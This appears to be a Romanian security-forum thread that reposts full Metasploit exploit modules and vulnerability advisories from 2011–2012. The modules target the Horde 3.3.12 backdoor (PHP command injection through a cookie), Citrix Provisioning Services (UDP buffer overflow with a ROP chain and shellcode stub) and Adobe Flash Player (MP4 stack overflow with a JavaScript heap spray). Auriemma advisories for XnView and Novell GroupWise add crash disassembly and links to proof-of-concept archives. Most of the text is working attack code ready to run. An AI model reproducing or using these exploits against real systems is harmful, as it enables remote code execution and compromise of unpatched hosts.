The_Arhitect

Omnia & IRA - The Fusion [Music Video] - YouTube

Horde 3.3.12 Backdoor Arbitrary PHP Code Execution ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Horde 3.3.12 Backdoor Arbitrary PHP Code Execution', 'Description' => %q{ This module exploits an arbitrary PHP code execution vulnerability introduced as a backdoor into Horde 3.3.12 and Horde Groupware 1.2.10. }, 'Author' => [ 'Eric Romang', # first public PoC 'jduck' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2012-0209'], [ 'URL', 'http://dev.horde.org/h/jonah/stories/view.php?channel_id=1&id=155' ], [ 'URL', 'http://eromang.zataz.com/2012/02/15/cve-2012-0209-horde-backdoor-analysis/' ] ], 'Privileged' => false, 'Payload' => { 'BadChars' => "\x0a\x0d", 'DisableNops' => true, 'Space' => 4096, 'Compat' => { 'PayloadType' => 'cmd', } }, 'Platform' => [ 'unix', 'linux' ], 'Arch' => ARCH_CMD, 'DefaultTarget' => 0, 'Targets' => [[ 'Automatic', { }]], 'DisclosureDate' => 'Feb 13 2012' )) register_options( [ OptString.new('URI', [true, "Path to Horde installation", "/horde"]), OptString.new('APP', [true, "App parameter required by javascript.php (must be active)", "horde"]), ], self.class) end def exploit # Make sure the URI begins with a slash uri = datastore['URI'] if uri[0,1] != '/' uri = '/' + uri end # Make sure the URI ends without a slash, because it's already part of the URI if uri[-1, 1] == '/' uri = uri[0, uri.length-1] end function = "passthru" key = Rex::Text.rand_text_alpha(6) arguments = "echo #{key}`"+payload.raw+"`#{key}" res = send_request_cgi({ 'uri' => uri + "/services/javascript.php", 'method' => 'POST', 'ctype' => 'application/x-www-form-urlencoded', 'data' => "app="+datastore['APP']+"&file=open_calendar.js", 'headers' => { 'Cookie' => "href="+function+":"+arguments, 'Connection' => 'Close', } }) #default timeout, we don't care about the response if (res) print_status("The server returned: #{res.code} #{res.message}") end resp = res.body.split(key) if resp and resp[1] print_status(resp[1]) else print_error("No response found") end handler end end Sursa: Horde 3.3.12 Backdoor Arbitrary PHP Code Execution

XnView <= 1.98.5 Multiple Vulnerabilities ####################################################################### Luigi Auriemma Application: XnView http://www.xnview.com Versions: <= 1.98.5 Platforms: Windows Bugs: A] integer overflow in width/height calculation B] jpeg heap overflow C] ICO heap overflow D] PCX heap overflow E] FLI heap overflow Exploitation: via file Date: 16 Feb 2012 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bugs 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== "XnView is an efficient multimedia viewer, browser and converter supporting more than 400 graphics formats" ####################################################################### ======= 2) Bugs ======= Note that this program has been tested only for a quick blind experiment of some minutes so this advisory is not much completed or detailed. ----------------------------------------------- A] integer overflow in width/height calculation ----------------------------------------------- The function that handles the width/height of the screen used for any file format if affected by some integer overflow vulnerabilities: 0047DB20 /$ 83EC 18 SUB ESP,18 ... 0047DB78 |> 8B4424 38 MOV EAX,DWORD PTR SS:[ESP+38] 0047DB7C |. 8B4C24 3C MOV ECX,DWORD PTR SS:[ESP+3C] 0047DB80 |. 8B6C24 34 MOV EBP,DWORD PTR SS:[ESP+34] 0047DB84 |. 8947 08 MOV DWORD PTR DS:[EDI+8],EAX 0047DB87 |. 894F 0C MOV DWORD PTR DS:[EDI+C],ECX 0047DB8A |. 8B55 00 MOV EDX,DWORD PTR SS:[EBP] 0047DB8D |. 8957 10 MOV DWORD PTR DS:[EDI+10],EDX 0047DB90 |. 8B4D 04 MOV ECX,DWORD PTR SS:[EBP+4] 0047DB93 |. 8D1485 00000000 LEA EDX,DWORD PTR DS:[EAX*4] ; integer overflow 0047DB9A |. 894F 14 MOV DWORD PTR DS:[EDI+14],ECX 0047DB9D |. 52 PUSH EDX 0047DB9E |. E8 B8311400 CALL xnview.005C0D5B ; malloc 0047DBA3 |. 8907 MOV DWORD PTR DS:[EDI],EAX 0047DBA5 |. 8B47 0C MOV EAX,DWORD PTR DS:[EDI+C] 0047DBA8 |. C1E0 02 SHL EAX,2 ; integer overflow 0047DBAB |. 50 PUSH EAX 0047DBAC |. E8 AA311400 CALL xnview.005C0D5B ; malloc 0047DBB1 |. 8B4F 08 MOV ECX,DWORD PTR DS:[EDI+8] 0047DBB4 |. 8947 04 MOV DWORD PTR DS:[EDI+4],EAX 0047DBB7 |. 8B45 00 MOV EAX,DWORD PTR SS:[EBP] 0047DBBA |. 83C4 08 ADD ESP,8 0047DBBD |. 3BC8 CMP ECX,EAX 0047DBBF |. 75 51 JNZ SHORT xnview.0047DC12 0047DBC1 |. 8B57 0C MOV EDX,DWORD PTR DS:[EDI+C] 0047DBC4 |. 8B45 04 MOV EAX,DWORD PTR SS:[EBP+4] 0047DBC7 |. 3BD0 CMP EDX,EAX 0047DBC9 |. 75 47 JNZ SHORT xnview.0047DC12 0047DBCB |. 33C0 XOR EAX,EAX 0047DBCD |. 3BCE CMP ECX,ESI 0047DBCF |. 7E 16 JLE SHORT xnview.0047DBE7 0047DBD1 |> 33C9 /XOR ECX,ECX ; write loop 0047DBD3 |. 8B17 |MOV EDX,DWORD PTR DS:[EDI] 0047DBD5 |. 66:8B4D 0E |MOV CX,WORD PTR SS:[EBP+E] 0047DBD9 |. 0FAFC8 |IMUL ECX,EAX 0047DBDC |. 890C82 |MOV DWORD PTR DS:[EDX+EAX*4],ECX 0047DBDF |. 8B4F 08 |MOV ECX,DWORD PTR DS:[EDI+8] 0047DBE2 |. 40 |INC EAX 0047DBE3 |. 3BC1 |CMP EAX,ECX 0047DBE5 |.^7C EA \JL SHORT xnview.0047DBD1 0047DBE7 |> 8B4F 0C MOV ECX,DWORD PTR DS:[EDI+C] 0047DBEA |. 33C0 XOR EAX,EAX 0047DBEC |. 3BCE CMP ECX,ESI 0047DBEE |. 0F8E B6000000 JLE xnview.0047DCAA 0047DBF4 |> 8B4D 08 /MOV ECX,DWORD PTR SS:[EBP+8] ; write loop 0047DBF7 |. 8B75 28 |MOV ESI,DWORD PTR SS:[EBP+28] 0047DBFA |. 0FAFC8 |IMUL ECX,EAX 0047DBFD |. 8B57 04 |MOV EDX,DWORD PTR DS:[EDI+4] 0047DC00 |. 03CE |ADD ECX,ESI 0047DC02 |. 890C82 |MOV DWORD PTR DS:[EDX+EAX*4],ECX 0047DC05 |. 8B4F 0C |MOV ECX,DWORD PTR DS:[EDI+C] 0047DC08 |. 40 |INC EAX 0047DC09 |. 3BC1 |CMP EAX,ECX 0047DC0B |.^7C E7 \JL SHORT xnview.0047DBF4 0047DC0D |. E9 98000000 JMP xnview.0047DCAA The content of the 32bit value to write depends by the file format and the continuation of the execution after the exception may depend by the system in use (more chances using Windows 7). --------------------- B] jpeg heap overflow --------------------- Heap overflow during the handling of the "Samples per Line" in the Baseline DCT header: 006E1E5B > 8B7424 3C MOV ESI,DWORD PTR SS:[ESP+3C] 006E1E5F . 8B6C24 14 MOV EBP,DWORD PTR SS:[ESP+14] 006E1E63 > 33DB XOR EBX,EBX 006E1E65 . 83C1 03 ADD ECX,3 006E1E68 . 8A1C06 MOV BL,BYTE PTR DS:[ESI+EAX] 006E1E6B . 8BF3 MOV ESI,EBX 006E1E6D . 33DB XOR EBX,EBX 006E1E6F . 8A18 MOV BL,BYTE PTR DS:[EAX] 006E1E71 . 8BFB MOV EDI,EBX 006E1E73 . 33DB XOR EBX,EBX 006E1E75 . 8A1C28 MOV BL,BYTE PTR DS:[EAX+EBP] 006E1E78 . 8BEB MOV EBP,EBX 006E1E7A . 8B5C24 18 MOV EBX,DWORD PTR SS:[ESP+18] 006E1E7E . 8B1CAB MOV EBX,DWORD PTR DS:[EBX+EBP*4] 006E1E81 . 03DE ADD EBX,ESI 006E1E83 . 8A1413 MOV DL,BYTE PTR DS:[EBX+EDX] 006E1E86 . 8851 FD MOV BYTE PTR DS:[ECX-3],DL 006E1E89 . 8B5424 1C MOV EDX,DWORD PTR SS:[ESP+1C] 006E1E8D . 8B1CBA MOV EBX,DWORD PTR DS:[EDX+EDI*4] 006E1E90 . 8B5424 20 MOV EDX,DWORD PTR SS:[ESP+20] 006E1E94 . 031CAA ADD EBX,DWORD PTR DS:[EDX+EBP*4] 006E1E97 . 8B5424 24 MOV EDX,DWORD PTR SS:[ESP+24] 006E1E9B . C1FB 10 SAR EBX,10 006E1E9E . 03DE ADD EBX,ESI 006E1EA0 . 8A1C13 MOV BL,BYTE PTR DS:[EBX+EDX] 006E1EA3 . 8859 FE MOV BYTE PTR DS:[ECX-2],BL 006E1EA6 . 8B5C24 28 MOV EBX,DWORD PTR SS:[ESP+28] 006E1EAA . 8B3CBB MOV EDI,DWORD PTR DS:[EBX+EDI*4] 006E1EAD . 03FE ADD EDI,ESI 006E1EAF . 8B7424 34 MOV ESI,DWORD PTR SS:[ESP+34] 006E1EB3 . 40 INC EAX 006E1EB4 . 4E DEC ESI 006E1EB5 . 8A1C17 MOV BL,BYTE PTR DS:[EDI+EDX] 006E1EB8 . 897424 34 MOV DWORD PTR SS:[ESP+34],ESI 006E1EBC . 8859 FF MOV BYTE PTR DS:[ECX-1],BL 006E1EBF .^75 9A JNZ SHORT xnview.006E1E5B -------------------- C] ICO heap overflow -------------------- Heap overflow during the handling of an ICO file with a smaller number of bits per pixels than how much specified in the main header. -------------------- D] PCX heap overflow -------------------- Heap overflow in the handling of the PCX files. The provided proof-of-concept should result in EIP 0x61616161. -------------------- E] FLI heap overflow -------------------- Heap overflow in the handling of the frames in the FLI files. ####################################################################### =========== 3) The Code =========== http://aluigi.org/poc/xnview_1.zip http://www.exploit-db.com/sploits/18491.zip ####################################################################### ====== 4) Fix ====== No fix. ####################################################################### Sursa: XnView <= 1.98.5 Multiple Vulnerabilities

Novell GroupWise Messenger <= 2.1.0 Arbitrary Memory Corruption ####################################################################### Luigi Auriemma Application: Novell GroupWise Messenger http://www.novell.com/products/groupwise/ Versions: <= 2.1.0 Platforms: Windows, Linux, NetWare Bug: write4 Exploitation: remote, versus server Date: 16 Feb 2012 (found 10 May 2011) Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== Check vendor's homepage and version because this is an old advisory. ####################################################################### ====== 2) Bug ====== nmma.exe is a service running on port 8300. The protocol is composed by fields that have particular types, for example 10 for strings or 8 for integers and so on like any RPC protocol. Through the "createsearch" command sent from a valid account and a type 9 value is possible to write a 0x00000000 in an arbitrary memory location: 00496E2A |> 8B5D 0C /MOV EBX,DWORD PTR SS:[EBP+C] 00496E2D |> 8B4D F8 MOV ECX,DWORD PTR SS:[EBP-8] 00496E30 |. 8A47 06 |MOV AL,BYTE PTR DS:[EDI+6] 00496E33 |. 81E1 FFFF0000 |AND ECX,0FFFF 00496E39 |. 3C 02 |CMP AL,2 00496E3B |. 8B5C8B 04 |MOV EBX,DWORD PTR DS:[EBX+ECX*4+4] ... 00496F3A |. C703 00000000 |MOV DWORD PTR DS:[EBX],0 ; EBX is controlled 00496F40 |. 83C3 04 |ADD EBX,4 00496F43 |. 53 |PUSH EBX 00496F44 |. 6A 20 |PUSH 20 00496F46 |. E8 5541F9FF |CALL nmma.0042B0A0 Seems that this vulnerability can be reached only with a valid account. In my PoC I have used a pre-build admin::adminpass account so remember to change the NM_A_PARM1 field if you want to use another one. ####################################################################### =========== 3) The Code =========== http://aluigi.org/poc/nmma_x.zip http://www.exploit-db.com/sploits/nmma_x.zip nmma_x 3 SERVER ####################################################################### ====== 4) Fix ====== No fix. ####################################################################### Sursa: Novell GroupWise Messenger <= 2.1.0 Arbitrary Memory Corruption

E veche faza ma.

Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020000 Buffer Overflow ## # $Id: $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp def initialize(info = {}) super(update_info(info, 'Name' => 'Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020000 Buffer Overflow', 'Description' => %q{ This module exploits a remote buffer overflow in the Citrix Provisioning Services 5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet to the 6905/UDP port. The module has been successfully tested on Windows Server 2003 SP2, Windows 7, and Windows XP SP3. }, 'License' => MSF_LICENSE, 'Author' => [ 'AbdulAziz Hariri', # Initial discovery via ZDI 'alino <26alino[at]gmail.com>' # Metasploit module ], 'Version' => '$Revision: $', 'References' => [ ['BID', '49803'], ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-009'], ['URL', 'http://support.citrix.com/article/CTX130846'] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'InitialAutoRunScript' => 'migrate -f', }, 'Payload' => { 'BadChars' => "\x00", 'EncoderOptions' => {'BufferRegister'=>'ECX'}, }, 'Platform' => ['win'], 'Targets' => [ [ 'Citrix Provisioning Services 5.6 SP1', { 'Offset' => 2012, 'Ret' => 0x0045403a # ADD ESP,664; RETN 04 streamprocess.exe } ] ], 'Privileged' => true, 'DisclosureDate' => 'Nov 04 2011', #CTX130846 creation date 'DefaultTarget' => 0)) register_options([Opt::RPORT(6905)], self.class) end def exploit packet = "\x00\x00\x02\x40" # DATA MSG packet << rand_text_alpha_upper(18) packet << "\x00\x00\x00\x00" # Length packet << rand_text_alpha_upper(target['Offset']) packet << [target.ret].pack('V') rop_nop = [0x004a072c].pack('V') * 38 # RETN streamprocess.exe rop_gadgets = [ 0x0045b141, # POP EAX; RETN streamprocess.exe 0x1009a1bc, # VirtualProtect() 0x00436d44, # MOV EAX,DWORD PTR DS:[EAX]; RETN streamprocess.exe 0x004b0bbe, # XCHG EAX,ESI; RETN streamprocess.exe 0x004ad0cf, # POP EBP; RETN streamprocess.exe 0x00455d9d, # PUSH ESP; RETN streamprocess.exe 0x00497f5a, # POP EAX; RETN streamprocess.exe 0xfffff9d0, # dwSize 0x00447669, # NEG EAX; RETN streamprocess.exe 0x004138a7, # ADD EBX,EAX; XOR EAX,EAX; RETN streamprocess.exe 0x00426305, # POP ECX; RETN streamprocess.exe 0x00671fb9, # lpflOldProtect 0x004e41e6, # POP EDI; RETN streamprocess.exe 0x0040f004, # RETN streamprocess.exe 0x00495c05, # POP EAX; RETN streamprocess.exe 0xffffffc0, # flNewProtect 0x0042c79a, # NEG EAX; RETN streamprocess.exe 0x0049b676, # XCHG EAX,EDX; RETN streamprocess.exe 0x0045c1fa, # POP EAX; RETN streamprocess.exe 0x90909090, # NOP 0x00435bbe, # PUSHAD; RETN streamprocess.exe ].pack("V*") packet[258, rop_nop.length] = rop_nop packet[410, rop_gadgets.length] = rop_gadgets packet[494, 10] = "\xeb\x03\x59\xff\xd1\xe8\xf8\xff\xff\xff" packet[504, payload.encoded.length] = payload.encoded print_status("Trying target #{target.name}...") connect_udp udp_sock.put(packet) handler disconnect_udp end end Sursa: Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020000 Buffer Overflow

Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info={}) super(update_info(info, 'Name' => "Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow", 'Description' => %q{ This module exploits a vulnerability found in Adobe Flash Player's Flash10u.ocx component. When processing a MP4 file (specifically the Sequence Parameter Set), Flash will see if pic_order_cnt_type is equal to 1, which sets the num_ref_frames_in_pic_order_cnt_cycle field, and then blindly copies data in offset_for_ref_frame on the stack, which allows arbitrary remote code execution under the context of the user. Numerous reports also indicate that this vulnerability has been exploited in the wild. Please note that the exploit requires a SWF media player in order to trigger the bug, which currently isn't included in the framework. However, software such as Longtail SWF Player is free for non-commercial use, and is easily obtainable. }, 'License' => MSF_LICENSE, 'Author' => [ 'Alexander Gavrun', #RCA 'Abysssec', #PoC 'sinn3r' #Metasploit ], 'References' => [ [ 'CVE', '2011-2140' ], [ 'BID', '49083' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-276/' ], [ 'URL', 'http://www.kahusecurity.com/2011/cve-2011-2140-caught-in-the-wild/' ], [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb11-21.html' ], [ 'URL', 'http://0x1byte.blogspot.com/2011/11/analysis-of-cve-2011-2140-adobe-flash.html' ], [ 'URL', 'http://www.abysssec.com/blog/2012/01/31/exploiting-cve-2011-2140-another-flash-player-vulnerability/' ] ], 'Payload' => { 'BadChars' => "\x00", 'StackAdjustment' => -3500 }, 'DefaultOptions' => { 'ExitFunction' => "seh", 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], [ 'IE 6 on Windows XP SP3', { 'Offset' => '0x600' } ], #0x5f4 = spot on [ 'IE 7 on Windows XP SP3 / Vista', { 'Offset' => '0x600' } ] ], 'Privileged' => false, 'DisclosureDate' => "Aug 9 2011", 'DefaultTarget' => 0)) register_options( [ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation']), OptString.new('SWF_PLAYER_URI', [true, 'Path to the SWF Player']) ], self.class) end def get_target(agent) #If the user is already specified by the user, we'll just use that return target if target.name != 'Automatic' if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/ return targets[1] elsif agent =~ /MSIE 7/ return targets[2] else return nil end end def on_request_uri(cli, request) agent = request.headers['User-Agent'] my_target = get_target(agent) # Avoid the attack if the victim doesn't have the same setup we're targeting if my_target.nil? print_error("Browser not supported, will not launch attack: #{agent.to_s}: #{cli.peerhost}:#{cli.peerport}") send_not_found(cli) return end # The SWF requests our MP4 trigger if request.uri =~ /\.mp4$/ print_status("Sending MP4 to #{cli.peerhost}:#{cli.peerport}...") #print_error("Sorry, not sending you the mp4 for now") #send_not_found(cli) send_response(cli, @mp4, {'Content-Type'=>'video/mp4'}) return end # Set payload depending on target p = payload.encoded js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch)) js = <<-JS var heap_obj = new heapLib.ie(0x20000); var code = unescape("#{js_code}"); var nops = unescape("#{js_nops}"); while (nops.length < 0x80000) nops += nops; var offset = nops.substring(0, #{my_target['Offset']}); var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); while (shellcode.length < 0x40000) shellcode += shellcode; var block = shellcode.substring(0, (0x80000-6)/2); heap_obj.gc(); for (var i=1; i < 0x300; i++) { heap_obj.alloc(block); } JS js = heaplib(js, {:noobfu => true}) if datastore['OBFUSCATE'] js = ::Rex::Exploitation::JSObfu.new(js) js.obfuscate end myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'] mp4_uri = "http://#{myhost}:#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.mp4" swf_uri = "#{datastore['SWF_PLAYER_URI']}?autostart=true?=video.jpg&file=#{mp4_uri}" html = %Q| <html> <head> <script> #{js} </script> </head> <body> <object width="1" height="1" type="application/x-shockwave-flash" data="#{swf_uri}"> <param name="movie" value="#{swf_uri}"> </object> </body> </html> | html = html.gsub(/^\t\t/, '') print_status("Sending html to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, html, {'Content-Type'=>'text/html'}) end def exploit @mp4 = create_mp4 super end def create_mp4 ftypAtom = "\x00\x00\x00\x20" #Size ftypAtom << "ftypisom" ftypAtom << "\x00\x00\x02\x00" ftypAtom << "isomiso2avc1mp41" mdatAtom = "\x00\x00\x00\x10" #Size mdatAtom << "mdat" mdatAtom << "\x00\x00\x02\x8B\x06\x05\xFF\xFF" moovAtom1 = "\x00\x00\x08\x83" #Size moovAtom1 << "moov" #Move header box header moovAtom1 << "\x00\x00\x00" moovAtom1 << "lmvhd" # Type moovAtom1 << "\x00\x00\x00\x00" # Version/Flags moovAtom1 << "\x7C\x25\xB0\x80\x7C\x25\xB0\x80" # Creation time moovAtom1 << "\x00\x00\x03\xE8" # Time scale moovAtom1 << "\x00\x00\x2F\x80" # Duration moovAtom1 << "\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" moovAtom1 << "\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00" moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x02\xFA" moovAtom1 << "trak" # Track box header moovAtom1 << "\x00\x00\x00\x5C" moovAtom1 << "tkhd" moovAtom1 << "\x00\x00\x00\x0F" moovAtom1 << "\x7C\x25\xB0\x80\x7C\x25\xB0\x80" # Creation time moovAtom1 << "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x2E\xE0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" moovAtom1 << "\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" moovAtom1 << "\x00\x00\x00\x00\x40\x00\x00\x00\x01\x42\x00\x00\x01\x42\x00\x00\x00\x00\x02" moovAtom1 << "rmdia" moovAtom1 << "\x00\x00\x00\x20" # Size moovAtom1 << "mdhd" # Media header box moovAtom1 << "\x00\x00\x00\x00" # Version/Flags moovAtom1 << "\x7C\x25\xB0\x80\x7C\x25\xB0\x80" # Creation time moovAtom1 << "\x00\x00\x00\x01" # Time scale moovAtom1 << "\x00\x00\x00\x0C" # Duration moovAtom1 << "\x55\xC4\x00\x00" moovAtom1 << "\x00\x00\x00\x2D" # Size moovAtom1 << "hdlr" # Handler Reference header moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x00" moovAtom1 << "vide" # Handler type moovAtom1 << "\x00\x00\x00\x00\x00" moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00" moovAtom1 << "VideoHandler" # Handler name moovAtom1 << "\x00\x00\x00\x02\x1D" moovAtom1 << "minf" moovAtom1 << "\x00\x00\x00\x14" moovAtom1 << "vmhd" moovAtom1 << "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x24" moovAtom1 << "dinf" # Data information box header moovAtom1 << "\x00\x00\x00\x1c" moovAtom1 << "dref" # Data reference box moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x01" moovAtom1 << "\x00\x00\x00\x0C" # Size moovAtom1 << "url " # Data entry URL box moovAtom1 << "\x00\x00\x00\x01" # Location / version / flags moovAtom1 << "\x00\x00\x09\xDD" # Size moovAtom1 << "stbl" moovAtom1 << "\x00\x00\x08\x99" moovAtom1 << "stsd" moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x01" moovAtom1 << "\x00\x00\x08\x89" # Size moovAtom1 << "avc1" moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" moovAtom1 << "\x01\x42" # Width moovAtom1 << "\x01\x42" # Height moovAtom1 << "\x00\x48\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" moovAtom1 << "\x18" # Depth moovAtom1 << "\xFF\xFF" moovAtom1 << "\x00\x00\x08\x33" # Size moovAtom1 << "avcC" moovAtom1 << "\x01" # Config version moovAtom1 << "\x64" # Avc profile indication moovAtom1 << "\x00" # Compatibility moovAtom1 << "\x15" # Avc level indication moovAtom1 << "\xFF\xE1" # Although the fields have different values, they all become 0x0c0c0c0c # in memory. cycle = "\x00\x00\x00" cycle << "\x30\x30\x30\x30" #6th cycle << "\x00\x00\x00" cycle << "\x18\x18\x18\x18" #7th cycle << "\x00\x00\x00" cycle << "\x0c\x0c\x0c\x0c" #8th cycle << "\x00\x00\x00" cycle << "\x06\x06\x06\x06" #1st cycle << "\x00\x00\x00" cycle << "\x03\x03\x03\x03" cycle << "\x00\x00\x00\x01\x81\x81\x81\x80\x00\x00\x00" cycle << "\xc0\xc0\xc0\xc0" # 4th cycle << "\x00\x00\x00" cycle << "\x60\x60\x60\x60" spsunit = "\x08\x1A\x67\x70\x34\x32\x74\x70\x00\x00\xAF\x88\x88\x84\x00\x00\x03\x00\x04\x00\x00\x03\x00\x3F\xFF\xFF\xFF\xFF\xFF" spsunit << "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" spsunit << "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFC" spsunit << cycle * 35 spsunit << "\x00\x00\x00\x30\x30\x03\x03\x03\x03\x00\x00\x00\xB2\x2C" moovAtom2 = "\x00\x00\x00\x18" moovAtom2 << "stts" moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x0C\x00\x00\x00\x01" moovAtom2 << "\x00\x00\x00\x14" moovAtom2 << "stss" moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00" moovAtom2 << "pctts" moovAtom2 << "\x00\x00\x00\x00\x00\x00" moovAtom2 << "\x00\x0C\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00" moovAtom2 << "\x01\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x02" moovAtom2 << "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x01\x00" moovAtom2 << "\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x02" moovAtom2 << "\x00\x00\x00\x1C" moovAtom2 << "stsc" moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01" moovAtom2 << "\x00\x00\x00\x44" moovAtom2 << "stsz" moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" moovAtom2 << "\x0C\x00\x00\x2F\x8D\x00\x00\x0C\xFE\x00\x00\x04\x42\x00\x00\x0B\x20\x00\x00\x04\x58\x00\x00\x07\x19\x00\x00\x07" moovAtom2 << "\x63\x00\x00\x02\xD6\x00\x00\x03\xC1\x00\x00\x0A\xDF\x00\x00\x04\x9B\x00\x00\x09\x39" moovAtom2 << "\x00\x00\x00\x40" moovAtom2 << "stco" moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x0C\x00\x00\x00\x30\x00\x00\x2F\xBD\x00\x00\x3D\x8A\x00\x00\x48\x19\x00\x00\x5A\xF4" moovAtom2 << "\x00\x00\x66\x1F\x00\x00\x73\xEA\x00\x00\x82\x32\x00\x00\x8A\xFA\x00\x00\x95\x51\x00\x00\xA7\x16\x00\x00\xB1\xE5" moovAtom = moovAtom1 + spsunit + moovAtom2 m = ftypAtom + mdatAtom + moovAtom return m end end =begin C:\WINDOWS\system32\Macromed\Flash\Flash10u.ocx Flash10u+0x5b4e8: Missing image name, possible paged-out or corrupt data. 1f06b4e8 8901 mov dword ptr [ecx],eax ds:0023:020c0000=00905a4d 0:008> !exchain 020bfdfc: <Unloaded_ud.drv>+c0c0c0b (0c0c0c0c) ECX points to 0x0c0c0c0c at the time of the crash: 0:008> r eax=00000000 ebx=00000000 ecx=0c0c0c0c edx=7c9032bc esi=00000000 edi=00000000 eip=0c0c0c0c esp=020befa8 ebp=020befc8 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050246 <Unloaded_ud.drv>+0xc0c0c0b: 0c0c0c0c ?? ??? Example of SWF player URI: http://www.jeroenwijering.com/embed/mediaplayer.swf To-do: IE 8 target =end Sursa: Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow

Altele apar pe parcurs.

